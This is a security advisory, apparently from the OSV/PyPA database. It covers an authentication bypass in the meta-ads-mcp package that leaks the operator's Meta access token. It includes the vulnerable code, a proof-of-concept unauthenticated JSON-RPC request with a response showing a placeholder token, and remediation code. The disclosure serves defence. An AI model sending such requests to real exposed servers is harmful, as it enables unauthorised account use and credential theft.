PYSEC-2026-413

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/meta-ads-mcp/PYSEC-2026-413.yaml
JSON Data
https://api.osv.dev/v1/vulns/PYSEC-2026-413
Aliases
Published
2026-06-29T11:50:52.704177Z
Modified
2026-07-01T20:22:57.686031Z
Severity
  • 9.1 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N CVSS Calculator
Summary
Meta Ads MCP: Unauthenticated HTTP MCP Tool Execution Leaks Operator Meta Access Token
Details

Unauthenticated HTTP MCP Tool Execution Leaks Operator Meta Access Token

| Field | Value | | ---------------- | ----- | | Repository | pipeboard-co/meta-ads-mcp | | Affected version | ≤ 1.0.101 (commit 496c988 ~ 7d14226); Versions 1.0.102–1.0.105 lack git tags, so patch status is unconfirmed. | | Vulnerability | CWE-287 — Improper Authentication | | Severity | Critical | | CVSS 3.1 | 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) |

Summary

AuthInjectionMiddleware.dispatch() at http_auth_integration.py:272 unconditionally forwards unauthenticated Streamable HTTP requests to downstream MCP tool handlers without issuing a 401 response, allowing any network-reachable caller to invoke MCP tools without authentication. When no per-request credential is present, tool handlers fall back to the META_ACCESS_TOKEN environment variable, and when the downstream Meta Graph API call fails, api.py:263–269 serialises the raw httpx request URL—including the operator's access_token as a query parameter—into the JSON-RPC response body, delivering the credential to the unauthenticated caller.

Affected Code

meta_ads_mcp/core/http_auth_integration.py:272 — middleware unconditionally calls call_next(request) even when no auth headers are present

        if not auth_token and not pipeboard_token:
            logger.warning("HTTP Auth Middleware: No authentication tokens found in headers")

        try:
            response = await call_next(request)   # line 272: no 401 returned
            return response
        finally:
            if auth_token:
                FastMCPAuthIntegration.clear_auth_token()
            if pipeboard_token:
                FastMCPAuthIntegration.clear_pipeboard_token()

meta_ads_mcp/core/api.py:136 — operator token appended to URL query parameters, exposed verbatim in Graph API error response request_url

    request_params = params or {}
    request_params["access_token"] = access_token

Unauthenticated HTTP POST /mcp → AuthInjectionMiddleware.dispatch():272 (no 401 returned) → tool handler invokes make_api_request() using META_ACCESS_TOKEN env fallback → request_params["access_token"]:136 (token in URL) → Graph API error path at api.py:263–269 returns request_url containing access_token=… in 200 OK JSON-RPC response.

Proof of Concept

Step 1 — POST /mcp with no auth headers: HTTP 200 OK with operator access_token in request_url — proves unauthenticated tool execution and operator credential leakage.

docker run --rm -p 127.0.0.1:8080:8080 -e META_ACCESS_TOKEN=FAKE_TOKEN_FOR_POC_DEMO_123456789 meta-ads-mcp-vuln001 &
python3 poc.py
POST /mcp HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/json
Accept: application/json, text/event-stream

{"jsonrpc":"2.0","method":"tools/call","id":2,"params":{"name":"get_ad_accounts","arguments":{"limit":1}}}
HTTP/1.1 200 OK
 Content-Type: application/json

{
  "jsonrpc": "2.0",
  "id": 2,
  "result": {
    "content": [
      {
        "type": "text",
        "text": "{\"data\": \"{\\n  \\\"error\\\": {\\n    \\\"message\\\": \\\"HTTP Error: 400\\\",\\n    \\\"details\\\": {\\n      \\\"error\\\": {\\n        \\\"message\\\": \\\"Invalid OAuth access token data.\\\",\\n        \\\"type\\\": \\\"OAuthException\\\",\\n        \\\"code\\\": 190\\n      }\\n    },\\n    \\\"full_response\\\": {\\n      \\\"status_code\\\": 400,\\n      \\\"url\\\": \\\"https://graph.facebook.com/v24.0/me/adaccounts?...&access_token=FAKE_TOKEN_FOR_POC_DEMO_123456789\\\",\\n      \\\"request_url\\\": \\\"https://graph.facebook.com/v24.0/me/adaccounts?fields=id%2Cname%2Caccount_id%2Caccount_status%2Camount_spent%2Cbalance%2Ccurrency%2Cage%2Cbusiness_city%2Cbusiness_country_code&limit=1&access_token=FAKE_TOKEN_FOR_POC_DEMO_123456789\\\"\\n    }\\n  }\\n}\"}"
      }
    ],
    "isError": false
  }
}

Impact

An unauthenticated attacker who can reach the MCP server's HTTP port (default 8080) can invoke any registered MCP tool as the operator, consuming the operator's Meta Ads API quota and performing read or write operations on connected Meta ad accounts. When any tool call triggers a Graph API error, the operator's META_ACCESS_TOKEN is returned verbatim in the request_url field of the 200 OK JSON-RPC response, enabling the attacker to exfiltrate the long-lived credential and subsequently access the Meta Graph API directly outside the MCP interface.

Remediation

In AuthInjectionMiddleware.dispatch() (http_auth_integration.py), return a 401 Unauthorized response when neither auth_token nor pipeboard_token is present, instead of falling through to call_next:

from starlette.responses import Response

if not auth_token and not pipeboard_token:
    return Response(
        content='{"error":"Unauthorized"}',
        status_code=401,
        media_type="application/json",
    )

In make_api_request() (api.py), strip access_token from the request_url in error payloads, or transmit the token via an Authorization: Bearer header rather than a URL query parameter to prevent it from appearing in URLs, server logs, or error responses.

References

Affected packages

PyPI / meta-ads-mcp

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.0.109

Affected versions

0.*
0.1.0
0.2.0
0.2.1
0.2.2
0.2.3
0.2.4
0.2.5
0.2.6
0.2.8
0.2.9
0.3.0
0.3.1
0.3.2
0.3.3
0.3.5
0.3.6
0.3.7
0.3.8
0.3.9
0.3.10
0.4.0
0.4.1
0.4.2
0.4.3
0.4.4
0.4.5
0.4.6
0.4.7
0.4.8
0.4.9
0.5.0
0.6.0
0.7.0
0.7.1
0.7.2
0.7.3
0.7.4
0.7.5
0.7.6
0.7.7
0.7.8
0.7.9
0.7.10
0.8.0
0.9.0
0.9.1
0.9.2
0.9.3
0.10.0
0.10.1
0.10.2
0.10.5
0.10.6
0.10.7
0.10.9
0.11.0
0.11.1
0.11.2
0.11.3
0.11.4
0.11.5
0.11.6
1.*
1.0.0
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7
1.0.8
1.0.10
1.0.11
1.0.12
1.0.13
1.0.15
1.0.16
1.0.17
1.0.18
1.0.19
1.0.20
1.0.21
1.0.22
1.0.23
1.0.24
1.0.25
1.0.26
1.0.27
1.0.28
1.0.29
1.0.30
1.0.31
1.0.33
1.0.34
1.0.35
1.0.36
1.0.38
1.0.39
1.0.40
1.0.41
1.0.42
1.0.43
1.0.44
1.0.45
1.0.46
1.0.47
1.0.48
1.0.49
1.0.50
1.0.51
1.0.52
1.0.53
1.0.54
1.0.55
1.0.56
1.0.57
1.0.58
1.0.59
1.0.60
1.0.61
1.0.62
1.0.63
1.0.64
1.0.65
1.0.66
1.0.67
1.0.68
1.0.69
1.0.70
1.0.71
1.0.72
1.0.73
1.0.74
1.0.75
1.0.76
1.0.77
1.0.78
1.0.79
1.0.80
1.0.81
1.0.82
1.0.83
1.0.84
1.0.85
1.0.86
1.0.87
1.0.88
1.0.89
1.0.90
1.0.91
1.0.92
1.0.93
1.0.94
1.0.95
1.0.96
1.0.97
1.0.98
1.0.99
1.0.100
1.0.101
1.0.102
1.0.103
1.0.104
1.0.105
1.0.106
1.0.107
1.0.108

Database specific

source
"https://github.com/pypa/advisory-database/blob/main/vulns/meta-ads-mcp/PYSEC-2026-413.yaml"
last_known_affected_version_range
"<= 1.0.108"